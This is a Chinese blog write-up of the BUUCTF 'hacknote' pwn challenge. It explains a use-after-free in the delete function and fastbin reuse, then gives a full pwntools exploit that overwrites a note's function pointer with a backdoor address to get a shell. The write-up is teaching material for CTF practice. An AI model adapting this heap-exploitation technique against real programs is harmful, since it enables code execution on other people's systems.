堆利用 UAF漏洞

已于 2022-05-25 16:06:22 修改
阅读量682 收藏 3
点赞数 1
分类专栏: buuctf刷题记录 ctf—pwn理论知识 文章标签: 安全 安全架构
于 2022-05-16 00:33:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64195960/article/details/124791396
版权

前言:

笔者是一个pwn的rookie dog有不对的地方请师傅指正呀

我觉得我现在uaf应该还是比较详细的hhh

我也会不定时写一些自己的刷题记录和学习记录,欢迎关注和探讨hhh

这是buuctf上的一道很经典的uaf的题目,正好刚学想要来做一下,和ctfviki上面差不多。

一、checksec一下

二、丢进ida

1)main函数

菜单函数(menu)已经帮我们总结了这些函数的意思,我们会在下面展开看这些函数

补充知识点1:

ida的小技巧(快捷键)

我们可以用注释键(也就是带/?那个)在ida那一行写注释

我们可以讲menu函数中的内容以注释的形式展示在旁边,便于阅读

同时像g可以跳转,上方颜色条可以快速定位等等,详情可见这位师傅归纳的博客

后面的我也还不太会用哈哈哈

IDA Pro7.0使用技巧总结 - 先知社区

2)add_note()

我们看这种堆体,可以试试先看这里——malloc的地方

1.红色箭头

count计数,最多有5个结点(note)

2.黄色箭头

程序会先申请一个0x8大小的空间,这里面分为两个部分(可以理解为两个指针)

一个指针进行函数跳转,输出real content的内容(这个看青色箭头)

一个指针指向real_content(这个看蓝色箭头)

3.青色箭头

使其可以输出real_content

4.粉色箭头

输入real content的空间

5.蓝色箭头

指向real_content

总结一下这个函数:

add_note为了构成这个结构

注意:这里的箭头只表示方向,不表示实际的物理地址

然后看一下我的exp调试,我add中buf的大小为0x30

2)dele函数

补充知识点2:

aoti()函数使把字符串型转化为整型

出现漏洞:

我们看红色箭头部分,我们只删除空间内,没有把指针至NULL,出现UAF漏洞

3)print_note

这个没什么好讲的啦,就是输出,调用了那个put

可能是我的ida问题,显示的怪难受的,所以从wiki上找了一份一样的,就是可能变量有一点点的小区别,相信大家还是可以看懂的!

4)magic函数

唔,白给的后门函数

三、分析思路】

请结合wp一起看呀

1)总体思路

这个给了后门函数的返回地址,并且会有put函数的跳转,如果我们可以覆写note中put位置为后门函数的返回地址,在实现print_note时就可以跳转到后门函数,从而就可以实现UAF的利用。

2)fast bins的LIFO以及chunk分配

补充知识点3:

fastbins的LIFO,最后进入bins(后free也就时后dele)的最先被取用

我们可以申请一个大小也为0x8的chunk,这样我们可以获得一个与上文一样的chunk,这样我们就可以改写put的位置(见补充知识点4)

补充知识点4:

操作系统会先从bins(这里的大小是fast bins)里面找相同大小的chunk,然后返回指针,指针指向的区域就是用户可写区域。

我们可以对put进行覆写(改为后门函数),在print里面进行调用

3)思路总结

综上我们需要开辟一个任意大小的空间(主要是为了add_note里面自己开辟的那0x8的位置)然后将其free掉,利用UAF漏洞

下面附带ctfviki的思路

这里的与所在bin不一样就是和0x8不一样,不然的话real_content会被分配,从而无法修改put。

我用我自己的语言描述一遍

STEP1

我们先申请了node 0和node 1,add函数会分别申请(申请两次)一个0x8和0x30

STEP3

我们删除了两个结点,它们分别进入fastbins中

STEP3

我们重新申请一个0x8大小的空间(add_note函数),这时候对管理器会去fastbisn中找两个0x10(还有两个控制字段)

堆管理器会先给我们node1的空间(这是add函数的第一个0x8),我们可以向一的content里写东西

注意,这里向1写东西实际上就是node 0的real content的部分实际写入

然后我们实际申请的0x8(也就是buf获得)就是node 0,由于real content的位置被写入了magic函数的地址

当我们执行print_note函数的时候,以为调用的还是note0原本的put(可实际上换作了magic函数)

这里理解的难点就是,我们add_note函数的时候给的是,node 0和node1 大小为0x10的空间

四、wp

from pwn import *

#r=remote('node4.buuoj.cn',25109)

r=process('./hacknote')

def add(size,content):

r.sendlineafter('choice :','1')

r.sendlineafter('Note size :',str(size))

r.sendlineafter('Content :',content)

def delete(idx):

r.sendlineafter('choice :','2')

r.sendlineafter('Index :',str(idx))

def printf(idx):

r.sendlineafter('choice :','3')

r.sendlineafter('Index :',str(idx))

shell_addr=0x8048945

add(48,'aaaa')#0

add(48,'bbbb')#1

add(48,'cccc')#2

gdb.attach(r)

#pause()

delete(0)

delete(1)

pause()

add(8,p32(shell_addr))

#pause()

printf(0)

r.interactive()

附带摘录的博客链接

Use After Free - CTF Wiki (ctf-wiki.org)

IDA Pro7.0使用技巧总结 - 先知社区

qwq-123
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
初学 UAF漏洞及double free 利用手法(libc2.23)
weixin_66751120的博客
03-06 973
UAF漏洞及double free 利用手法(libc2.23) 通过一道例题加深理解
漏洞-UAF漏洞简析
qq_43390703的博客
10-04 6189
UAF use after free,其内容如同其名称。在free后进行利用UAF结构漏洞的一种重要的利用方式。 内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。 内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可能可以正常运转。 内存块被释放后,其对应的指针没有被设置为 NULL,但是在它下一次使用之前,有代码对这块内存进行了修改,那么当程序再次使用这块内存时,就很有可能会出现奇怪的问题。
UAF漏洞简单利用
mfeofn的博客
11-30 224
应用程序调用free()释放内存时,如果内存块小于256kb,dlmalloc并不马上将内存块释放回内存,而是将内存块标记为空闲状态。dlmalloc不会缓存大于256kb的内存块,因为这样的内存块太大了,最好不要长期占用这么大的内存资源。mmap用于大内存块:如果应用程序请求的内存块大于256KB,dlmalloc通常会使用mmap等系统调用向操作系统请求一个新的内存区域。第一次申请的内存空间在释放过后没有进行内存回收,导致下次申请内存的时候再次使用该内存块,使得以前的内存指针可以访问修改过的内存。
Android内核层驱动程序UAF漏洞提权实例
道阻且长,行则将至。
02-28 7559
文章目录前言UAF漏洞 前言 自 2021 年 11 月从国企离职并入职互联网私企后,发现博客很少更新了……自然不是因为开始躺平了(菜鸡的学习之路还很漫长…),而是新的平台充满挑战,需要学习的东西实在太多了(所以一直加班中…),加上很多内部学习材料和内容不可在公司外网传播,所以就很少写 CSDN 博文了。但是稍有时间还是要保持写博文习惯的hh,个人觉得这不仅是对个人技术成长的记录,也是一种促使自己不断保持学习状态的好习惯。 换工作后开始从事移动终端安全的方向,最近在学习 Android 内核层和驱动的漏洞
漏洞学习笔记——UAF漏洞
谈成(C/C++)
04-30 1421
UAF即为Use After Free。也就是使用了已经被释放的内存,最终导致内存崩溃或任意代码被执行的漏洞UAF漏洞常见于浏览器中,如IE、Chrome、Firefox等。 当分配有内存的指针被释放后,如果指针没有及时置空。那么此时的指针就被称为“悬挂指针”,也就是俗称的野指针。引用此类指针就会出现各种意外情况。举例以下代码。 #include "stdafx.h" #include <stdlib.h> #include <tchar.h> #include <windo
利用UAF漏洞
2302_76827504的博客
04-07 75
内存块被释放后,其对应的指针没有被设置为 NULL,然后再次申请我们精心的构造的内存块,就能够达到攻击的效果。
从hacknote了解UAF漏洞
weixin_44864859的博客
07-07 627
首先查看程序的基本功能,基本的菜单形式,主要提供了三个功能,创建,删除,打印。(即malloc块,free块,printf块中的数据) 查看程序基本信息 拖进ida中进行伪代码审计,由于此题没有去掉符号表,因此审计相对比较简答。创建和打印部分的代码均没有什么漏洞,在删除功能处可以发现很明显的UAF漏洞,在free掉content指针和结构体指针后均没有将其置为NULL。 另外可以找到程序中存在后门函数magic 进行调试分析,首先创建两个note(note0和note1),大小都为0x10,g
利用uaf
2302_79813730的博客
03-08 1009
use after free,释放后使用UAF漏洞全称为use after free ,即利用已经被free掉的块被再次利用,该漏洞的存在是因为程序编写者在free块部分没有将该块的fd指针改为0,进而导致该块可以被申请回来,那么被free的块有下面三种情况:1. 块free后,其对应指针被设置为NULL,即再次被调用该块时就会发生错误;2.块free后,对应指针没有被设置为NULL,即还可以调用会该块,当我们申请一个比该块小于等于的size时。
UAF (Use After Free)漏洞分析及利用
热门推荐
4ct10n
06-23 2万+
因为大作业的需求要调试一个浏览器的UAF漏洞,首先必须对UAF漏洞有个整体的了解,本篇文章主要讲解UAF造成的原因以及利用方法,这里结合2016年HCTF fheap
漏洞uaf1
08-04
uaf漏洞是一种常见的溢出漏洞,可能会导致程序崩溃或出现意外情况。因此,在编程时,需要小心地处理内存的释放和使用,以免出现uaf漏洞。 知识点: * uaf漏洞的定义和分类 * uaf漏洞的出现原因和场景 * uaf漏洞...
玩转-漏洞利用技巧.docx
01-10
漏洞利用技巧 一、基础知识 是一种特殊的完全二叉树数据结构,在操作系统中,程序在运行时动态申请和释放的内存空间。不同的操作系统对有不同的管理策略,例如 Linux 发行版中使用 ptmalloc/dlmalloc,...
深入分析Chrome浏览器textbook UAF漏洞 .pdf
09-05
本文章以CVE-2020-6449为例,探讨如何利用存在于Fast区域中的UAF漏洞实现远程代码执行(RCE)。这个特定的漏洞发生在`DeferredTaskHandler::BreakConnections`函数中,正常情况下,`active_source_handlers_`确保了`...
2016年iOS公开可利用漏洞总结
08-31
JavaScriptCore库中的漏洞允许黑客执行任意代码,而内核漏洞则能泄露内核信息,进一步引发UAF漏洞。这种攻击链能实现远程完美越狱,对iOS安全构成了重大威胁。 再者,iOS 9.3.3中发现的IOMobileFramebuffer ...
XNU内核漏洞分析与利用.pdf
01-02
而在iOS上,由于不能利用NULL page,攻击者需要首先通过信息泄露获取内核缓冲区地址,然后将ROP链复制到内核内存中,以利用UAF执行ROP。 在后续的iOS 10.2和macOS 10.12.2中,发现了一个新的内核溢出漏洞,涉及到...
赛蓝企业管理系统 AuthToken/Index 身份认证绕过漏洞复现
0xSec
08-03 177
赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。
内网安全:多种横向移动方式
最新发布
8888的博客
08-03 536
DCOM:DCOM(分布式组件对象模型)是微软的一系列概念和程序接口。它支持不同的两台机器上的组件间的通信,不论它们是运行在局域网、广域网、还是Internet上。利用这个接口,客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求,使用DCOM进行横向移动的优势之一在于,在远程主机上执行的进程将会是托管COM服务器端的软件获取DCOM列表:实验前提:1.关闭防火墙2.必须有管理员权限。
云原生安全检测工具(容器安全、trivy、veinmind-tools)
墨痕诉清风的博客
07-31 578
例如上文的 mysql:5.7 镜像,在扫描镜像包含的 openssl 库时,会根据操作系统版本,去 trivy.db 的"Oracle Linux 7"、“openssl”桶中查询相关漏洞信息,并最终生成 CVE-2021-23840 漏洞告警。如果没有,则需要解析基础镜像,并根据其中的操作系统版本文件(etc/alpine-release、usr/lib/os-release、/etc/os-release 等),来确定基础镜像的操作系统版本。‍‍Trivy 的漏洞库,名叫 trivy-db​​。
【系统架构设计师】二十四、安全架构设计理论与实践①
帅次的博客
08-03 545
在信息系统的整个生命周期中,安全保障应包括技术、管理、人员和工程过程的整体安全,以及相关组织机构的健全等。目前,网络与信息安全风险类别可以分为人为蓄意破坏(被动型攻击,主动型攻击)、灾害性攻击、系统故障、人员无意识行为
CVE-2019-0708:Windows远程桌面UAF漏洞分析与复现
本文档详细探讨了CVE-2019-0708,一个针对Windows操作系统的严重安全漏洞,该漏洞主要涉及到Use-After-Free(UAF)问题。作者选择这个主题是为了扩展对不同平台,尤其是Windows系统安全的理解。 二、实验目标 实验...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值